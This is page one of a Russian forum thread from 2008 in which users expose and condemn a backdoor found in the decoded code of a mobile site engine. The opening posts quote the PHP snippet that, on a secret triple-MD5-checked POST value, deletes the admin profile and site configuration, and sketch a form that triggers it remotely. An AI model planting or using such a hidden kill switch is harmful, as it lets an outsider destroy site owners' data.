Привет, Гость!
Главная
Вход

Последняя активность

Форум / Интернет / Вап мастеру на заметку
Поиск
  Бэкдоры мотора 17 !!!
1 2 3 >>
Тема закрыта
Падонагъ Падонагъ [Off] [#] (17.02.2008 / 19:19)
Камрады,в соседнем разделе всплыла инфа,в расшифрованном файле gzip.php ( спасибо камраду def) обнаружены такие строки:
if(md5(md5(md5($_POST['log'])))=="94beb4eddd1ca52274be3b95cb3c1b1b"){
unlink (BASEDIR."local/profil/$config_nikname.prof");
unlink (BASEDIR."local/config.dat");
unset($_POST['log'],$_POST['par']);
header ("Location: ".BASEDIR."index.php?".SID);
exit;

то есть по русски-
Если
{тройной мд5 хэш от значения элемента с ключом log ,переданного в массиве $_POST, равен 94beb4eddd1ca52274be3b95cb3c1b1b
}
удалить профиль админа этого сайта;
удалить файл с настройами сайта;
уничтожить элементы пост массива (хз наверно следы замести);
перенаправить на главную( полюбоваться на дело рук своих гГг);

так то ,девочки и мальчики
AlkatraZ AlkatraZ (SV!) [Off] [#] (17.02.2008 / 19:28)
Уездный предводитель Каманчей
Дааа, дожились. Ужос.
Но пихать бэкдоры - это реальня подлянка.
Падонагъ Падонагъ [Off] [#] (17.02.2008 / 19:36)
то есть представьте себе файл к примеру visavi.net/pizdec/index.php с примерно следующим содержымым:
<?php
echo "<form action='адрес_сайта/index.php' method='post'>
<input type='hidden' name='log' value='кое_что' />
<input type='submit' value='Убить сайт' /></form>";
?>

который сто пудов существует. Видимо он создан для того чтоб гробить сайты,на которых сняли бесплатно копирайт. Но!!! Вредоносный код содержыцца ф каждом сайте где установлен мотор 17 ! Каково владельцам этих сайтов будет узнать, что в любой момент откуда то извне могут уничтожыть их сайт,в который было вложено немало труда,и возможно средств?? При чом это сможет сделать не только Вантуз, а любой кто подберет необходимое значение этой переменной
Изм. Падонагъ (17.02.2008 / 19:37) [1]
Падонагъ Падонагъ [Off] [#] (17.02.2008 / 19:43)
вообщем, братва,думайте сами... Ваше дело ждать ли выход нового мотора и ставить ли его. Ну а Вантуз полностью потеряет доверие юзеров. Так вещи не делаются.На его месте я бы бросил писать,ушел бы из инета и спрятался чтоб меня не нашли...
МихалЫч МихалЫч [Off] [#] (17.02.2008 / 20:38)
Жек, палюбак прально мыслишь...
Rarih Rarih [Off] [#] (17.02.2008 / 20:45)
Ебать мой хуй...
Piks Piks [Off] [#] (17.02.2008 / 21:14)
Мда, я не ожидал такого.. Пиздец =//
Но всеравно, у меня уже даверие к мотору отпало с выходом 16 версии, непонрвился мне он изначально. Мне уже пох что они с этим мотором сделают
matis4e matis4e [Off] [#] (17.02.2008 / 21:49)
жадность в реале убивает все человеческое. Но он бы один до этого не дошел бы, кто то подполкнул его на ето. Фу бля. В тихом омуте мрази живут.
Piks Piks [Off] [#] (17.02.2008 / 21:51)
Дык слышал, что некий BWC эту систему шифрования придумал
StalKeR StalKeR [Off] [#] (17.02.2008 / 22:07)
принцип шифровани походу был взят из дле(там тоже eval(base64_decode());
йогин йогин [Off] [#] (17.02.2008 / 22:14)
а где можно скачать раскодированный 17 мотор?
Падонагъ Падонагъ [Off] [#] (17.02.2008 / 22:16)
а нахуй он тебе нужен? Тут ребята файлы расшифровали,у них спроси
МихалЫч МихалЫч [Off] [#] (17.02.2008 / 23:37)
Piks(17.02.2008/15:14):" ...Но всеравно, у меня уже даверие к мотору отпало с выходом 16 версии, непонрвился мне он изначально... "Если честно... мине также... только поставил и сразу удалил, зря трафик спалил только... самая удачная версия это 15.7 ИМХО
Борман Борман [Off] [#] (18.02.2008 / 00:15)
гггг вот прикол! Маладец Вантуз што патстрахавался и трайным мд5 код этат защитил! иво практически ниразгадать типерь. мы далжны васхвалять иво типерь за такие прадуманные паступки! гггг интиресно при устанофке матора 17 скрипт нешлёт инфу а сцайте где он установлен и на автаматическую праверку капирайта? а то чо зря траф. палить... сиди сибе и удаляй сцайты! гггг нихарашо такаг! абалдеть....
NEMO NEMO [Off] [#] (18.02.2008 / 00:16)
Гг. Мля, уже второй день читаю и тихо охуеваю со всего происходящего. Но бэкдор это уже чересчур. Интересно, что в зашифрованных файлах еще припасено?
Monstr Monstr [Off] [#] (18.02.2008 / 00:35)
Джон, а шо ты мне сказал про бэкдоры когда я про чат мотора спрашивал? Мля вот это жестко санек резанул
Изм. Monstr (18.02.2008 / 00:35) [1]
Inferpse Inferpse [Off] [#] (18.02.2008 / 00:51)
гг, а я от делать нефиг кейген сделал ))
ппц он конечно гонит: чтоб расшифровать файл, надо столько проходов и операций сделать, а учитывая то, что почти в каждой странице мотора инклудится несколько таких шифрованых файлов, то грузит это серв нехило.

Кстати вантуз не придумывал алгоритм шифрования - есть прога походу "TrueBug PHP Encoder" - вот она таким макаром шифрует, только gzip.php руками закодирован был. Бэкдор обидно - в ответ на это можно спокойно копирайты снимать :\
Den398 Den398 [Off] [#] (18.02.2008 / 01:23)
Добрый день всем кто меня знает и не знает,почитал и ахуел
NEMO NEMO [Off] [#] (18.02.2008 / 01:25)
Бугага. На Визави была тема про бэкдор(автора не успел посмотреть) Снесли нах.
Inferpse Inferpse [Off] [#] (18.02.2008 / 01:26)
Она уже не первая такая тема на визави..)
  Всего: 58
1 2 3 >>

Фильтр по автору
Скачать тему

Форум

Новые вверху
0 / 48

Gazenwagen Gegenkulturelle Gemeinschaft